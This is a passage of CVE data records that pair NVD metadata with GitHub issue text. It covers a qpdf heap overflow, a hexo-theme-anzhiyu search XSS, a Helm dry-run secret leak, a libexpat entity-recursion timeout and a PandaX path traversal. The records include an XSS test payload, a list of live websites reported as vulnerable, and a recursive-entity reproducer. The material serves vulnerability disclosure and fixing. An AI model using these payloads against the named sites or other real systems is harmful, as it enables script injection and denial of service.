#2 0x7ffff6e0661a in std::allocator_traits<std::allocator<QPDFObjectHandle> >::allocate(std::allocator<QPDFObjectHandle>&, unsigned long) /usr/include/c++/11/bits/alloc_traits.h:464
#3 0x7ffff6e0661a in std::_Vector_base<QPDFObjectHandle, std::allocator<QPDFObjectHandle> >::_M_allocate(unsigned long) /usr/include/c++/11/bits/stl_vector.h:346
#4 0x7ffff6e0661a in void std::vector<QPDFObjectHandle, std::allocator<QPDFObjectHandle> >::_M_realloc_insert<QPDFObjectHandle const&>(__gnu_cxx::__normal_iterator<QPDFObjectHandle*, std::vector<QPDFObjectHandle, std::allocator<QPDFObjectHandle> > >, QPDFObjectHandle const&) /usr/include/c++/11/bits/vector.tcc:440
SUMMARY: AddressSanitizer: heap-buffer-overflow /usr/include/c++/11/bits/shared_ptr_base.h:704 in std::__shared_count<(__gnu_cxx::_Lock_policy)2>::~__shared_count()
Shadow bytes around the buggy address:
0x0c0c7fff9a00: 00 00 02 fa fa fa fa fa fd fd fd fd fd fd fd fd
0x0c0c7fff9a10: fa fa fa fa fd fd fd fd fd fd fd fd fa fa fa fa
0x0c0c7fff9a20: fd fd fd fd fd fd fd fd fa fa fa fa 00 00 00 00
0x0c0c7fff9a30: 00 00 00 00 fa fa fa fa fd fd fd fd fd fd fd fd
0x0c0c7fff9a40: fa fa fa fa fd fd fd fd fd fd fd fd fa fa fa fa
=>0x0c0c7fff9a50: fd fd fd fd fd fd fd fd fa fa fa[fa]00 00 00 00
0x0c0c7fff9a60: 00 00 00 00 fa fa fa fa fd fd fd fd fd fd fd fd
0x0c0c7fff9a70: fa fa fa fa 00 00 00 00 00 00 00 00 fa fa fa fa
0x0c0c7fff9a80: 00 00 00 00 00 00 00 00 fa fa fa fa 00 00 00 00
0x0c0c7fff9a90: 00 00 00 00 fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0c7fff9aa0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==3736122==ABORTING
[Inferior 1 (process 3736122) exited with code 01]
```
### Environment
```shell
Distributor ID: Ubuntu
Description: Ubuntu 22.04.3 LTS
Release: 22.04
Codename: jammy
gcc version 11.4.0 (Ubuntu 11.4.0-1ubuntu1~22.04)
clang version 11.0.0 (https://github.com/aflgo/aflgo fa125da5d70621daf7141c6279877c97708c8c1f)
afl-cc++4.09a
build-essential is already the newest version (12.9ubuntu3).
libjpeg-dev is already the newest version (8c-2ubuntu10).
ghostscript is already the newest version (9.55.0~dfsg1-0ubuntu5.6).
libgnutls28-dev is already the newest version (3.7.3-4ubuntu1.3).
libssl-dev is already the newest version (3.0.2-0ubuntu1.12).
zlib1g-dev is already the newest version (1:1.2.11.dfsg-2ubuntu9.2).
libtiff-tools is already the newest version (4.3.0-6ubuntu0.7).
cmake is already the newest version (3.22.1-1ubuntu1.22.04.1).
```
### Credit
Chen zhiyuan ([2507519957@qq.com](mailto:2507519957@qq.com)/[czy_edu@whut.edu.cn](mailto:czy_edu@whut.edu.cn))
| qpdf11.9.0 found a heap-buffer-overflow crash | https://api.github.com/repos/qpdf/qpdf/issues/1123/comments | 4 | 2024-01-15T02:29:15Z | 2024-02-04T23:10:11Z | https://github.com/qpdf/qpdf/issues/1123 | 2,081,133,505 | 1,123 | 6,002 |
CVE-2024-25865 | 2024-03-02T22:15:50.293 | Cross Site Scripting (XSS) vulnerability in hexo-theme-anzhiyu v1.6.12, allows remote attackers to execute arbitrary code via the algolia search function. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/anzhiyu-c/hexo-theme-anzhiyu/issues/200"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
],
"url": "https://github.com/anzhiyu-c/hexo-theme-anzhiyu/issues/200"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:anzhiyu-c:hexo-theme-anzhiyu:1.6.12:*:*:*:*:*:*:*",
"matchCriteriaId": "771C3906-072E-404B-9559-6DC3722B8C67",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/anzhiyu-c/hexo-theme-anzhiyu/issues/200 | [
"Exploit",
"Issue Tracking",
"Vendor Advisory"
] | github.com | [
"anzhiyu-c",
"hexo-theme-anzhiyu"
] | ### 使用的 AnZhiYu 版本? | What version of AnZhiYu are you use?
1.6.12
### 使用的浏览器? || What browse are you using?
Chrome
### 是否修改过主题文件? || Has the theme files been modified?
不是 (No)
### 使用的系统? || What operating system are you using?
Windows
### 问题描述 | Describe the bug
## 1、hexo博客搭建
- 安装node.js和git

- hexo博客框架安装
```coffeescript
npm install hexo-cli -g
hexo init blog
cd blog
npm install
hexo server
```
## 2、更换anzhiyu主题
- 下载anzhiyu主题到themes目录
git clone https://github.com/anzhiyu-c/hexo-theme-anzhiyu.git ./themes/anzhiyu
- 更改配置文件,将themes/anzhiyu/目录下的__config.yml文件名修改为_config.anzhiyu.yml。并将修改后的_config.anzhiyu.yml移动到blog目录下(和themes目录同级)。

- 修改_config.yml文件中的theme为anzhiyu

- 如果你没有 pug 以及 stylus 的渲染器,请下载安装:
npm install hexo-renderer-pug hexo-renderer-stylus --save
- 保存,启动hexo server
## 3、开启algolia评论系统
根据官方文档中的搜索系统配置,开启algolia配置。官方链接:
https://vcl-docs.anheyu.com/advanced/#%E6%90%9C%E7%B4%A2%E7%B3%BB%E7%BB%9F

## 4、漏洞复现


在多个使用anzhiyu主题及开启algolia搜索的博主网站中都有此xss漏洞。```
<img src=1 onerror=alert(132)>```
即可触发漏洞,如下:
https://blog.anheyu.com/
https://ichika.cc/
https://www.fomal.cc/
https://zoulicheng.cn/
https://zhsher.cn/
…………
几乎所有使用algolia搜索的网站中都有次xss漏洞。
## 5、漏洞分析
原因在于algolia.js中对于搜索结果的回显没有过滤。

也就是说不管输入什么内容都在在结果区域回显。动态调试下js代码:


修补建议:针对搜索输出进行的过滤
### 出现问题的网站 | Website
https://blog.anheyu.com/ https://ichika.cc/ https://www.fomal.cc/ https://zoulicheng.cn/ https://zhsher.cn/ ………… | [Bug]: anzhiyu主题开启algolia搜索功能存在xss漏洞 | https://api.github.com/repos/anzhiyu-c/hexo-theme-anzhiyu/issues/200/comments | 1 | 2024-02-09T12:26:44Z | 2024-02-09T14:10:32Z | https://github.com/anzhiyu-c/hexo-theme-anzhiyu/issues/200 | 2,127,036,392 | 200 | 6,003 |
CVE-2019-25210 | 2024-03-03T21:15:49.867 | An issue was discovered in Cloud Native Computing Foundation (CNCF) Helm through 3.13.3. It displays values of secrets when the --dry-run flag is used. This is a security concern in some use cases, such as a --dry-run call by a CI/CD tool. NOTE: the vendor's position is that this behavior was introduced intentionally, and cannot be removed without breaking backwards compatibility (some users may be relying on these values). Also, it is not the Helm Project's responsibility if a user decides to use --dry-run within a CI/CD environment whose output is visible to unauthorized persons. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.2,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/helm/helm/issues/7275"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://helm.sh/blog/response-cve-2019-25210/"
},
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "https://www.cncf.io/projects/helm/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/helm/helm/issues/7275"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://helm.sh/blog/response-cve-2019-25210/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product"
],
"url": "https://www.cncf.io/projects/helm/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:helm:helm:-:*:*:*:*:*:*:*",
"matchCriteriaId": "606B3397-0482-45AB-9683-716665632036",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"200"
] | 200 | https://github.com/helm/helm/issues/7275 | [
"Issue Tracking"
] | github.com | [
"helm",
"helm"
] | <!-- If you need help or think you have found a bug, please help us with your issue by entering the following information (otherwise you can delete this text): -->
Output of `helm version`:
`helm version
version.BuildInfo{Version:"v3.0.2", GitCommit:"19e47ee3283ae98139d98460de796c1be1e3975f", GitTreeState:"clean", GoVersion:"go1.13.5"}`
Output of `kubectl version`:
`kubectl version
Client Version: version.Info{Major:"1", Minor:"15", GitVersion:"v1.15.3", GitCommit:"2d3c76f9091b6bec110a5e63777c332469e0cba2", GitTreeState:"clean", BuildDate:"2019-08-19T11:13:54Z", GoVersion:"go1.12.9", Compiler:"gc", Platform:"darwin/amd64"}`
Cloud Provider/Platform (AKS, GKE, Minikube etc.):
### Issue
`helm3` `--dry-run` command prints content of the secrets where helm2 just the fact that secret has been created.
**This creates issue running helm `--dry-run` in CI/CD tools as it exposes secrets.**
```
helm upgrade --install myrelease mychart --set thanos.sayamlbase64=TESTSECRET --dry-run
Release "myrelease" has been upgraded. Happy Helming!
NAME: myrelease
LAST DEPLOYED: Thu Dec 19 15:11:43 2019
NAMESPACE: kube-system
STATUS: pending-upgrade
REVISION: 400
TEST SUITE: None
HOOKS:
MANIFEST:
---
# Source: mychart/templates/thanos-objstore-config-secret.yaml
apiVersion: v1
data:
thanos.yaml: TESTSECRET
kind: Secret
metadata:
name: thanos-objstore-config
namespace: kube-system
type: Opaque
---
```
```
helm2 upgrade --install release-name chart --set thanos.sayamlbase64=TESTSECRET --dry-run
Release "release-name" has been upgraded. Happy Helming!
LAST DEPLOYED: Thu Dec 19 14:51:59 2019
NAMESPACE: kube-system
STATUS: DEPLOYED
RESOURCES:
==> v1/Secret
NAME TYPE DATA AGE
thanos-objstore-config Opaque 1 80d
``` | helm 3 shows secrets with --dry-run option in clear text | https://api.github.com/repos/helm/helm/issues/7275/comments | 64 | 2019-12-19T21:19:04Z | 2024-05-14T17:53:00Z | https://github.com/helm/helm/issues/7275 | 540,573,246 | 7,275 | 6,004 |
CVE-2024-28757 | 2024-03-10T05:15:06.570 | libexpat through 2.6.1 allows an XML Entity Expansion attack when there is isolated use of external parsers (created via XML_ExternalEntityParserCreate). | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Patch",
"Release Notes"
],
"url": "http://www.openwall.com/lists/oss-security/2024/03/15/1"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/libexpat/libexpat/issues/839"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Patch"
],
"url": "https://github.com/libexpat/libexpat/pull/842"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FPLC6WDSRDUYS7F7JWAOVOHFNOUQ43DD/"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LKJ7V5F6LJCEQJXDBWGT27J7NAP3E3N7/"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VK2O34GH43NTHBZBN7G5Y6YKJKPUCTBE/"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://security.netapp.com/advisory/ntap-20240322-0001/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Patch",
"Release Notes"
],
"url": "http://www.openwall.com/lists/oss-security/2024/03/15/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch"
],
"url": "https://github.com/libexpat/libexpat/issues/839"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Patch"
],
"url": "https://github.com/libexpat/libexpat/pull/842"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FPLC6WDSRDUYS7F7JWAOVOHFNOUQ43DD/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LKJ7V5F6LJCEQJXDBWGT27J7NAP3E3N7/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VK2O34GH43NTHBZBN7G5Y6YKJKPUCTBE/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://security.netapp.com/advisory/ntap-20240322-0001/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:libexpat_project:libexpat:*:*:*:*:*:*:*:*",
"matchCriteriaId": "463A4DD2-9DA6-420C-A361-293B1166B9C6",
"versionEndExcluding": "2.6.2",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:38:*:*:*:*:*:*:*",
"matchCriteriaId": "CC559B26-5DFC-4B7A-A27C-B77DE755DFF9",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:39:*:*:*:*:*:*:*",
"matchCriteriaId": "B8EDB836-4E6A-4B71-B9B2-AA3E03E0F646",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:40:*:*:*:*:*:*:*",
"matchCriteriaId": "CA277A6C-83EC-4536-9125-97B84C4FAF59",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:vmware_vsphere:*:*",
"matchCriteriaId": "3A756737-1CC4-42C2-A4DF-E1C893B4E2D5",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:netapp:oncommand_workflow_automation:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5735E553-9731-4AAC-BCFF-989377F817B3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:netapp:ontap:9:*:*:*:*:*:*:*",
"matchCriteriaId": "A20333EE-4C13-426E-8B54-D78679D5DDB8",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:netapp:ontap_tools:10:*:*:*:*:vmware_vsphere:*:*",
"matchCriteriaId": "5333B745-F7A3-46CB-8437-8668DB08CD6F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:netapp:windows_host_utilities:-:*:*:*:*:*:*:*",
"matchCriteriaId": "15282AE5-2005-4852-8FC8-EF2CE0E28FB4",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netapp:h300s_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "6770B6C3-732E-4E22-BF1C-2D2FD610061C",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netapp:h300s:-:*:*:*:*:*:*:*",
"matchCriteriaId": "9F9C8C20-42EB-4AB5-BD97-212DEB070C43",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netapp:h500s_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7FFF7106-ED78-49BA-9EC5-B889E3685D53",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netapp:h500s:-:*:*:*:*:*:*:*",
"matchCriteriaId": "E63D8B0F-006E-4801-BF9D-1C001BBFB4F9",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netapp:h700s_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "56409CEC-5A1E-4450-AA42-641E459CC2AF",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netapp:h700s:-:*:*:*:*:*:*:*",
"matchCriteriaId": "B06F4839-D16A-4A61-9BB5-55B13F41E47F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netapp:h410s_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "D0B4AD8A-F172-4558-AEC6-FF424BA2D912",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netapp:h410s:-:*:*:*:*:*:*:*",
"matchCriteriaId": "8497A4C9-8474-4A62-8331-3FE862ED4098",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netapp:h410c_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "234DEFE0-5CE5-4B0A-96B8-5D227CB8ED31",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netapp:h410c:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CDDF61B7-EC5C-467C-B710-B89F502CD04F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netapp:h610c_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "89612649-BACF-4FAC-9BA4-324724FD93A6",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netapp:h610c:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F3D9B255-C1AF-42D1-BF9B-13642FBDC080",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netapp:h610s_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "FD7CFE0E-9D1E-4495-B302-89C3096FC0DF",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netapp:h610s:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F63A3FA7-AAED-4A9D-9FDE-6195302DA0F6",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
] | [
"776"
] | 776 | https://github.com/libexpat/libexpat/issues/839 | [
"Exploit",
"Issue Tracking",
"Patch"
] | github.com | [
"libexpat",
"libexpat"
] | # Issue
This is the public side of soon-public (access protected) oss-fuzz Expat finding:
[Issue 66812: expat:xml_parse_fuzzer_UTF-16: Timeout in xml_parse_fuzzer_UTF-16](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=66812).
The three key (access protected) contained links are:
- Detailed Report: https://oss-fuzz.com/testcase?key=5187173185814528
- Regressed: https://oss-fuzz.com/revisions?job=libfuzzer_asan_expat&range=202401100604:202401110602
- Reproducer Testcase: https://oss-fuzz.com/download?testcase_id=5187173185814528
The reproducer (original attached as file [clusterfuzz-testcase-minimized-xml_parse_fuzzer_UTF-16-5187173185814528-timeout-original.xml.txt](https://github.com/libexpat/libexpat/files/14502184/clusterfuzz-testcase-minimized-xml_parse_fuzzer_UTF-16-5187173185814528-timeout-original.xml.txt)) is essentially this two-file case:
File `one.xml`:
```xml
<!DOCTYPE doc SYSTEM "two.dtd">
<doc>&g1;</doc>
```
File `two.dtd`:
```xml
<!ENTITY % p1 '%p1'>
<!ENTITY g1 '%p1;'>
```
The original's SHA245 sum is `6b870c78cff9efe41f1060277f434da98b9f78e9159baf4cb95f034e890ac087`.
The regression link effectively links to https://github.com/libexpat/libexpat/compare/be47f6d5e871382dc2ab783a9df416ec4370074e...716fd10bd461be13c1f67ab11d96ca16a9a202ab (which makes good sense since these changes increase fuzzing coverage).
# Analysis
[ClusterFuzz](https://google.github.io/clusterfuzz/) uncovered two things at once here:
- Direct recursion (`a -> a` in contrast to indirect recursion `a -> b -> a`) of parameter entities (reference syntax `%name;`) was previously not detected in the [external subset](https://www.w3.org/TR/2006/REC-xml-20060816/#ExtSubset) — file `two.dtd` in the example above) — but it [is forbidden by the XML spec](https://www.w3.org/TR/2006/REC-xml-20060816/#norecursion) and was also causing undefined behavior at runtime.
```console
# ./fuzz/xml_parse_fuzzer_UTF-8 [..]/clusterfuzz-testcase-minimized-xml_parse_fuzzer_UTF-16-5187173185814528-timeout-original.xml.txt
INFO: Running with entropic power schedule (0xFF, 100).
INFO: Seed: 3441536382
INFO: Loaded 1 modules (21351 inline 8-bit counters): 21351 [0x558df02c6000, 0x558df02cb367),
INFO: Loaded 1 PC tables (21351 PCs): 21351 [0x558df02cb368,0x558df031e9d8),
./fuzz/xml_parse_fuzzer_UTF-8: Running 1 inputs 1 time(s) each.
Running: [..]/clusterfuzz-testcase-minimized-xml_parse_fuzzer_UTF-16-5187173185814528-timeout-original.xml.txt
[..]/expat/lib/xmlparse.c:6273:46: runtime error: applying zero offset to null pointer
SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior [..]/expat/lib/xmlparse.c:6273:46 in
```
Pull request #841 addresses that problem.
- The way that the fuzzing code uses external parsers (created via function [`XML_ExternalEntityParserCreate`](https://libexpat.github.io/doc/api/latest/#XML_ExternalEntityParserCreate)) caused a timeout revealing that due to the lack of any direct input bytes from the parent parser, the amplification ratio calculated by `accountingGetCurrentAmplification` was constantly reported as 1.0 and hence had little chance of stopping billion laughs attacks in practice. Pull request #842 addresses that problem.
Two related side notes:
- [ClusterFuzz](https://google.github.io/clusterfuzz/) leaked part of this finding — the recursion aspect — to the public corpus a few days ago as case `f9b6ba558667913f4554395e039c01f6d8217b43` that later disappeared from the public corpus again.
- Statement…
> If the same entity is declared more than once, the _first_ declaration encountered is binding;
…in [section 4.2 Entity Declarations](https://www.w3.org/TR/2006/REC-xml-20060816/#sec-entity-decl) of the XML spec is worth noting, emphasis mine.
CC @catenacyber @RMJ10 @Snild-Sony
| OSS-Fuzz/ClusterFuzz finding 66812 | https://api.github.com/repos/libexpat/libexpat/issues/839/comments | 8 | 2024-03-03T22:40:00Z | 2024-03-21T19:48:19Z | https://github.com/libexpat/libexpat/issues/839 | 2,165,602,679 | 839 | 6,005 |
CVE-2024-2564 | 2024-03-17T14:15:06.973 | A vulnerability was found in PandaXGO PandaX up to 20240310 and classified as critical. This issue affects the function ExportUser of the file /apps/system/api/user.go. The manipulation of the argument filename leads to path traversal: '../filedir'. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257063. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
